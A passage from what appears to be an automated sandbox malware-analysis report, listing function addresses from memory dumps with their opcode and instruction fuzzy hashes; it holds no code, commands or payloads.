                                                                                        • API String ID:
                                                                                        • Opcode ID: b6af397d021627be09e8018dfb1ca1118b6f4c59c5a7f769bb847bbb12ceccc6
                                                                                        • Instruction ID: 8c0d8ff58a85573674eba184cf11210414a565efe94a50bf620ccc9642be0876
                                                                                        • Opcode Fuzzy Hash: b6af397d021627be09e8018dfb1ca1118b6f4c59c5a7f769bb847bbb12ceccc6
                                                                                        • Instruction Fuzzy Hash: EC013171A0524CAFCB04EFA9D545AAEB7F4FF08700F104069BD05EB392EA749E00DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C98F6A, Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e30ff9256885cde0ea0e16cbec16ba906cc6cfd46a6d55dd9558e1441670afa1
                                                                                        • Instruction ID: 27088eab094cb19c6bb12920b5c60b6c20b31419240958927fed01069dcdf3b8
                                                                                        • Opcode Fuzzy Hash: e30ff9256885cde0ea0e16cbec16ba906cc6cfd46a6d55dd9558e1441670afa1
                                                                                        • Instruction Fuzzy Hash: DB014474A0420CAFCB04DFA9D545BAEB7F4EF08700F104069B905EB391EB74DA00DB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C81608, Relevance: .0, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6bd9dd36d3180593fd4c0119220d1fba1fb5fe462bf9f1e0bf080520eb4223d1
                                                                                        • Instruction ID: f5df9dc291b2b5403d285579263cbf1f64ad7ec414273b6fae6e98f5350c3a41
                                                                                        • Opcode Fuzzy Hash: 6bd9dd36d3180593fd4c0119220d1fba1fb5fe462bf9f1e0bf080520eb4223d1
                                                                                        • Instruction Fuzzy Hash: C0F06271A04248EFCB04EFA9D806A6FB7F8EF04300F0440A9B915EB392EA349900DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEC577, Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd3a2bc872fbb272f444276e0ee5663c82d6c0aa7935db4fb733a40bdb3aa0bc
                                                                                        • Instruction ID: d7206769f96ff8ae655ead7443bf922652a0fcf8d150a91e7edd43e95a0e7d4a
                                                                                        • Opcode Fuzzy Hash: cd3a2bc872fbb272f444276e0ee5663c82d6c0aa7935db4fb733a40bdb3aa0bc
                                                                                        • Instruction Fuzzy Hash: F1F09AB29156D09ED731872A8046B227FE8DB25770F6488E6E41687242C7A8FC82C350
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C82073, Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bb668b6cd737e6cbfcc94aadcbf6ff438e3cdae306a44876c778d8d2cf14fbd6
                                                                                        • Instruction ID: e733a71bf82d469ede5dc622f46d343c2927c0725dfab3229e584012e9b496c0
                                                                                        • Opcode Fuzzy Hash: bb668b6cd737e6cbfcc94aadcbf6ff438e3cdae306a44876c778d8d2cf14fbd6
                                                                                        • Instruction Fuzzy Hash: 19F05C764111844ADF327F24380A3D53BC8C75531CF2D0185F47027201CE348E87DB18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0927A, Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                        • Instruction ID: 50d6312bce8b10e7ad535dd182e7b75134dcbc5cfccb3d48c752632e3d1acfd1
                                                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                        • Instruction Fuzzy Hash: B8E092723406406BEB219E5ADC85F5777ADEF82721F0440BDB9045E283CAF6DD09C7A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C98D34, Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7aea7d258aee681fe88e15bc71776ed3e9a306f2dd047b2f09c2364d76b2c098
                                                                                        • Instruction ID: 45e5db4f287ada88506e26b9528bac4db1ea93307322f224bfa8c18f075829c4
                                                                                        • Opcode Fuzzy Hash: 7aea7d258aee681fe88e15bc71776ed3e9a306f2dd047b2f09c2364d76b2c098
                                                                                        • Instruction Fuzzy Hash: E8F09070A046089FCB04EBA9D446B6EB7B4EF04700F1080A9F905AB292EA34D900D754
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C98B58, Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7236a89ac6f65b5f77297b4cdbbd319823783b8e6e8de21625e8bd6cb34a6aaa
                                                                                        • Instruction ID: 17cbe44242c149ba194ea712a1d5cf5a79ceebcb1e31e6751ce133378433063f
                                                                                        • Opcode Fuzzy Hash: 7236a89ac6f65b5f77297b4cdbbd319823783b8e6e8de21625e8bd6cb34a6aaa
                                                                                        • Instruction Fuzzy Hash: D6F082B0A04258ABDB04EBA9D906F6EB3B4EF04300F5404A9BA05DB3D2EF74D900D794
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C98CD6, Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1d2f61b7a028ffd6e87d9cf2a65177f4ba0902ca14310ac2ad394bd58b10dfdc
                                                                                        • Instruction ID: e3c4ab5fbc6acfc8bce1fe40640143918806f914310c7a5477b71fd8a14e9b1b
                                                                                        • Opcode Fuzzy Hash: 1d2f61b7a028ffd6e87d9cf2a65177f4ba0902ca14310ac2ad394bd58b10dfdc
                                                                                        • Instruction Fuzzy Hash: 14F08271A04249ABCB04DBA9E946E6E77B4EF09300F1001A9F916EB2D2EE34DD04D754
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BE746D, Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e8e67258faf1c4aaa7caa2cf947865933c7f9423a0b1e26165e0a31cb9a5de56
                                                                                        • Instruction ID: 219a44b4e5a3a78ad008b01eb8252e71ab097ec0066a79a2a9c4bd7ff01f8ee1
                                                                                        • Opcode Fuzzy Hash: e8e67258faf1c4aaa7caa2cf947865933c7f9423a0b1e26165e0a31cb9a5de56
                                                                                        • Instruction Fuzzy Hash: D4F0B4349881C8AADF11A76AC880B79BBF1AF04310F1403E5E851AB2E1EB659C01D785
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BC4F2E, Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 453cc491222bc826aaa9c10d7e0b19db4baf64611badeb6cbb09a846d8cccde0
                                                                                        • Instruction ID: ada589f292d6b5bfe4b62ed8d489d450d4a75ece5cc58fad51ea14aa6adc4bf4
                                                                                        • Opcode Fuzzy Hash: 453cc491222bc826aaa9c10d7e0b19db4baf64611badeb6cbb09a846d8cccde0
                                                                                        • Instruction Fuzzy Hash: A9F0E2325256A88FD770C718D184B22B7D5FB11778F6444A6D42587D22C734EE84C680
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFA44B, Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 44ce1fa75b4bab0c1628b5bd1365eb6d1acf5daa49acb2b7497b50a5633df5e2
                                                                                        • Instruction ID: 7f07b9e4aa4f49964cf20ef21b0b4510685f096328fef5ad7383685d2f195ad8
                                                                                        • Opcode Fuzzy Hash: 44ce1fa75b4bab0c1628b5bd1365eb6d1acf5daa49acb2b7497b50a5633df5e2
                                                                                        • Instruction Fuzzy Hash: 3FE022B2A01420ABC2214B08AC80F6A739DDBD4700F090078FA08C7250C668DD02C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCF358, Relevance: .0, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                        • Instruction ID: 93e67a38b627dd93b3e514d6f50b45f17322a8bfe8d610f0e188375395fc57fe
                                                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                        • Instruction Fuzzy Hash: 05E0D832A40158BBCB2196D99D06FBABBEDDB84B60F0041E6B904DB190D5709D00C2D0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BDFF60, Relevance: .0, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3430fe872a6e8c5f32e8ec22e61306ccce60907598bf21a7d8d3f867be5ccb9
                                                                                        • Instruction ID: 0b5c518a8d2d107834238406339d6ce23a6925929849459f522b5e26e43d9d8e
                                                                                        • Opcode Fuzzy Hash: d3430fe872a6e8c5f32e8ec22e61306ccce60907598bf21a7d8d3f867be5ccb9
                                                                                        • Instruction Fuzzy Hash: 16E09AB120E2459EDB34DB56D0A0F39B7D8DB52729F1984AAE00A4B202D621DC80C25A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C541E8, Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ead38635cb37906d127b74178fc408dbf8bb85a338a6d82af09a35a344627110
                                                                                        • Instruction ID: ddc0ed8d57c3eb9a62c2a4fc958b665623e9232130ba28d65aaf23b7fc9efb29
                                                                                        • Opcode Fuzzy Hash: ead38635cb37906d127b74178fc408dbf8bb85a338a6d82af09a35a344627110
                                                                                        • Instruction Fuzzy Hash: B8F015B8811700CFCBA4EFA8990976836ACF74431AF30426AB010A72A5DF3449CDDF25
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C7D380, Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                        • Instruction ID: 1ca05f0dcc5ca3e6c288d5674006e994486e0be92473fea6af78677c9a7d6003
                                                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                        • Instruction Fuzzy Hash: 6FE0C231284244FBDB225E44CC01F697B76DF507A0F208035FE095A6A1CA75DD91E6C4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFA185, Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a6e9b582291ecf7498e5c1fa10758cf0614fc4a80a553eee489944ae99d3aee5
                                                                                        • Instruction ID: cb73d5a4bb9e9a71407349586b7eb7f910bb3a532d166ced52dc02c11780f16e
                                                                                        • Opcode Fuzzy Hash: a6e9b582291ecf7498e5c1fa10758cf0614fc4a80a553eee489944ae99d3aee5
                                                                                        • Instruction Fuzzy Hash: 0FD02EE21600481ADF2C2300DC64B35229AEB84B00F3108ACF20B2B9E1DEA88DD8920A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF16E0, Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 130b484c593214be20e2ac275069cde9972f0d6fd3de36a4123828ab256d6950
                                                                                        • Instruction ID: a5ccbbeba54115a80910de01beceffc30920fce977f99d44c1660089f8af82d7
                                                                                        • Opcode Fuzzy Hash: 130b484c593214be20e2ac275069cde9972f0d6fd3de36a4123828ab256d6950
                                                                                        • Instruction Fuzzy Hash: 91D0A771100140E6DE2D5B199805B2422D5DB80785F380CECF30B9A4C1DFB5DC96E04C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C453CA, Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                        • Instruction ID: 5fc6263b95884c50eaaeee84d2b116d6de642727f5bd56f30d73b9aa40ca935d
                                                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                        • Instruction Fuzzy Hash: 2FE0EC72A44B849BCF16EF59C690F5EB7F5FB44B40F150495B4186F672C665ED00CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00416CB5, Relevance: .0, Instructions: 14COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e6cce512013647aa0862d0a157a755373e0e019d30b09706da874fd74ae2600
                                                                                        • Instruction ID: 81c497cc9ab016be7f99b69cb5a63a0bf3d6570b8dee3e1b7c465cbbcde76631
                                                                                        • Opcode Fuzzy Hash: 0e6cce512013647aa0862d0a157a755373e0e019d30b09706da874fd74ae2600
                                                                                        • Instruction Fuzzy Hash: 6EB01213E9604D2C5B340C487D400B4EB65E2C3039F003393DD1CB3D008903C464818E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BDAAB0, Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                        • Instruction ID: 07c9b7ca0f7b30ad6b96a21a2401a5ebd17cdc248392345d77cb061b0a387f1a
                                                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                        • Instruction Fuzzy Hash: 86D0E939352990CFD616DB1DC554B1573A4FB44B44FD509D1E501CBB61E66CDD44CA01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF35A1, Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                        • Instruction ID: 598fa3a038ff18c69f6595b824d0afc3edd9a36c686bb6468cbf0ac7606c0ec7
                                                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                        • Instruction Fuzzy Hash: 30D0A9314012889ADF01BB10C25877C73F2FBA0B08F6820E692420B962C33E8F0ED600
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCDB40, Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                        • Instruction ID: 98e6dd6b2fea90796f15a367f5cd71b2a93c9189782dd18954f66bc454cd079e
                                                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                        • Instruction Fuzzy Hash: 6BC08C30280A40AEEB221F20CD02F0036E0FB01B01F4500E07300DA0F0EB78DC01E600
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C4A537, Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                        • Instruction ID: 12e3876c4590e3c78d46530cb2d75ef0d654231f1da8f634f85cc1762facb689
                                                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                        • Instruction Fuzzy Hash: 1CC08C33080688BBCB136F82CC01F167F6AFB94B60F008010FA080B571CA32E970EB84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BE3A1C, Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                        • Instruction ID: 8189e2614ae0ed2d76883500baf168c5ad4a8f9ef49df03e8a5aeaed6374b146
                                                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                        • Instruction Fuzzy Hash: A6C04C32180688BBCB126E46DD01F157B69E795B60F154061B6040A5618676ED61D59C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCAD30, Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                        • Instruction ID: dfee8d865188b7f1255e07ff13f3d3dc352949e6966cd00f214a39008726057e
                                                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                        • Instruction Fuzzy Hash: 48C08C320C0288BBC7126A46DD01F017B69E790B60F000020B6040A6628A32EC60E588
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD76E2, Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                        • Instruction ID: 69ca60a81b23656d31dff40507d6f5fd488b2816cf1836da2a589d540a4cc6cc
                                                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                        • Instruction Fuzzy Hash: 0DC08C701CA9C05AEB2A5708CE21B20B6D0EB08708F4801DCBA01096A2FB68EC02C288
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF36CC, Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                        • Instruction ID: 1d6433ce080ac70a27aae0e09880898b27d2accf8cc53cb7c544a34998fb9729
                                                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                        • Instruction Fuzzy Hash: CDC08C70154480BADA152B208D01B2472D4E700B21F6402D47220864E0D6389C00D108
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BE7D50, Relevance: .0, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                        • Instruction ID: c584795e94ad87f2d4cf76c2eba1f853859d0af2bc3b7bc5b8d28b3b653595e9
                                                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                        • Instruction Fuzzy Hash: A1B09234341981CFCE16DF19C480B1533E8FB44B40B8440E0E400CBA20D729E8008900
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF2ACB, Relevance: .0, Instructions: 5COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                        • Instruction ID: 66e08a753f29d0c8e8cf17ec76ec2b9abb53ef59ba6cd7f5f8437eebef2ec36f
                                                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                        • Instruction Fuzzy Hash: E7B092328105408BCF02BB40C650A19B371AB00750F054492A0112BA218228AC01CA40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C098A0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6f31d416166660168256aed75e6c2d16ce68a8b0b57ef0c339ce8c5cbea3ba1c
                                                                                        • Instruction ID: af6c1ecb0acccddf11ded03812371a0b28d77caecdf0456f05518d8bd402ae2f
                                                                                        • Opcode Fuzzy Hash: 6f31d416166660168256aed75e6c2d16ce68a8b0b57ef0c339ce8c5cbea3ba1c
                                                                                        • Instruction Fuzzy Hash: 0B9002A130101502D602615944246460509D7D2385FA1C422E1424555D86658993F1B2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C0B040, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 242c72276a45d0b8e729fd126ba7233abebe0640b49eb95dedc355b6947d24a3
                                                                                        • Instruction ID: dea22e0571bbd0f84569a7cb5e6d7ffdf3217ff99068d95c295a42262f5e24c5
                                                                                        • Opcode Fuzzy Hash: 242c72276a45d0b8e729fd126ba7233abebe0640b49eb95dedc355b6947d24a3
                                                                                        • Instruction Fuzzy Hash: A69002E1601151434A40B15948144465515A7E23413A1C531A0454560C86A88895F2E5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C09820, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c124111bf32a71b7fb783cf08be102b76d8e0513134826c55ba77b931241004
                                                                                        • Instruction ID: d0ac3f7d3a3ea728a024b13b6ddf6c939b5e74d4d46570bf696fcd9687477738
                                                                                        • Opcode Fuzzy Hash: 0c124111bf32a71b7fb783cf08be102b76d8e0513134826c55ba77b931241004
